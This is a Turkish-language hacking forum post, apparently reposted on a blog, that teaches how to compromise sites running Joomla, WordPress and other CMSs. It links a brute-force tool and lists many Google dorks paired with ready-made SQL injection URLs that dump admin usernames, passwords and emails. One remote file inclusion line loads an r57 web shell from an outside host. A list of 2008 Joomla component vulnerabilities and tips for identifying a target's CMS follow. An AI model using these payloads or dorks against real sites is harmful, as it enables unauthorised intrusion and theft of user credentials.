Haci simdiden cocugun gunahini almayalim
Aslinda Hakli 1 yerdede biz yazilimlar cok veriyoz. Boyle 1 yontem dene bax. Okumaya Basladinmi Basdan oku. Ben simdi 1-2 Acik Postaliycam. Sonra Hack oyretmiyorsunuz demeyin. Ilk once cokertmek istediyin sitenin adminine bayan nikiyle gideceksin
TMm saka yapiyordum her neyse devam. Bakiniz Bilirsinizki CMS
Sistemleri cokdur. Yani Wordpress var Seditio , Joomla , VBulletin , DLE
, Auto 1.2 , Elfchat filan falan felon. Mesela joomla tutalim. Joomla
hackingde en cok kullanilan yontemdir. Ve Wordpress-de aynen. Brute
Ederiz. Nasilmi? Program Download linki : http://s2.dosya.tc/server16/HNJRBU/brute.zip.htmlVideo : http://www.youtube.com/watch?v=H4wSTlsSBvo
Bu Joomla ve ya Wordpress Brute Force filan-di. Gelelim tekniyimize. Joomla Mesela Ne gibi aciklari vardir ? :
Modules Acigi :
Kod:
DORK : allinurl: "modules/glossaires" EXPLOIT : modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
Kod:
Google Dork: inurl:news.php?mode=voir Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/* Admin girisi = /admin
Kod:
DORK 1 : allinurl: "" detail DORK 2 : allinurl: "com_alberghi" EXPLOIT 1 : index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/* EXPLOIT 2 : index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Kod:
DORK 1 : allinurl: "com_joovideo" detail DORK 2 : allinurl: "com_joovideo" DORK 3 : Powered by joovideo V1.0 EXPLOIT : index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Kod:
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/" Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://evilc0der.com/r57.txt? Yontemi: Shell Panele yonlendirir
Kod:
Dork: Google : "allinurl:viewfaqs.php?cat=" Exploide: /viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Kod:
Dork: "allinurl:index.php?user=daysbooking" Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Kod:
Dork: allinurl:index.php?module=pnEncyclopedia Exploide (1-2) 1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11-- 2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Kod:
Dork 1 - content_by_cat.asp?contentid ''catid'' Dork 2 - content_by_cat.asp? ''catid'' exploit- content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
Emagic CMS.NET 4.0 :
Kod:
Dork : inurl:emc.asp?pageid= Exploit: emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
onunla bulmusduk bu dorklarli + kendi exploit-imizide yazdik NOT
NULL-larda bile ise yarayan 1 exploit Arsivimdedi. Bunlarda Arsiv-den
olsun :
Kod:
DORK 1 : allinurl:"com_na_content" DORK 2 : allinurl:"com_na_bible" DORK 3 : allinurl:"com_na_events" DORK 4 : allinurl:"com_na_content" DORK 5 : allinurl:"com_na_feedback" DORK 6 : allinurl:"com_na_mydocs" DORK 7 : allinurl:"com_na_churchmap" DORK 8 : allinurl:"com_na_bibleinfo" DORK 9 : allinurl:"com_na_dbs" DORK 10 : allinurl:"com_na_udm" DORK 11 : allinurl:"com_na_qforms" DORK 12 : allinurl:"com_na_gallery2" DORK 13 : allinurl:"com_na_publicrss" DORK 14 : allinurl:"index.php?kwd" EXPLOIT: index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Kod:
DorK : '' webboard question.asp QID'' EXPLOIT: question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Kod:
Dork 1 : ''showad.php?listingid='' Dork 2 : ''pfriendly.php?ad='' EXPLOIT: showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/* pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Kod:
DORK: allinurl:com_comprofiler Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL] Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Kod:
* 2008-03-25 Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability
* 2008-03-23 Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
* 2008-03-23 Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability
* 2008-03-23 Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability
* 2008-03-22 Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
* 2008-03-19 Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability
* 2008-03-19 Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability
* 2008-03-19 Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability
* 2008-03-18 Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability
* 2008-03-11 Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
* 2008-03-08 Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability
* 2008-02-23 Joomla Component simple shop 2.0 SQL Injection Vulnerability
* 2008-02-20 Joomla Component com_hwdvideoshare SQL Injection Vulnerability
* 2008-02-18 Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability
* 2008-02-18 Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability
* 2008-02-18 Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
* 2008-02-16 Joomla Component com_galeria Remote SQL Injection Vulnerability
* 2008-02-16 Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
* 2008-02-14 Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
* 2008-02-14 Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
* 2008-02-14 Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
* 2008-02-14 Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability
* 2008-02-13 Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
* 2008-02-12 Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability
* 2008-02-12 Joomla Component rapidrecipe <= 1.6.5 SQL Injection Vulnerability
* 2008-02-08 Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
* 2008-02-07 Joomla Component com_noticias 1.0 SQL Injection Vulnerability
* 2008-02-07 Joomla Component com_doc Remote SQL Injection Vulnerability
* 2008-02-06 Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
* 2008-02-03 Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability
* 2008-02-03 Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
* 2008-02-01 Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln
* 2008-01-30 Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities
* 2007-12-31 Joomla Component PU Arcade <= 2.1.3 SQL Injection Vulnerability
Post-da limit varmi yokmu bilmiyom onun icin az koydum. Soylediyim gibi
bu 1 cms Sistemi. 1 Sitede nasil acik ararsin? Siteye girersin en asagi
bakarsin Hangi CMS sistemi oldugunu oyrenirsin. Mesela
Millikuvvetler.net Bunun gibi 1 siteyi hacklasak o zaman CMS sistemine
bakarim. Millikuvvetler.net-de
Kod:
Powered by vBulletin® Version 3.8.4 Copyright ©2000 - 2012, Jelsoft Enterprises Ltd. Millikuvvetler.Net, Hack, Forum Hack, Msn Hack, Keylogger, Trojan, Anti Pkk, Anti Lamer
))))))
Ve 1 seyde mesela bu sitede acik var bu yol tutmuyor onun Bypass
yollarini ararimki Hack icin yararli olsun. Basarilar + Respect! ^_^
& Peace! Avatar Fearless.
Topic : http://www.millikuvvetler.net/showthread.php?t=8605
Hiç yorum yok:
Yorum Gönder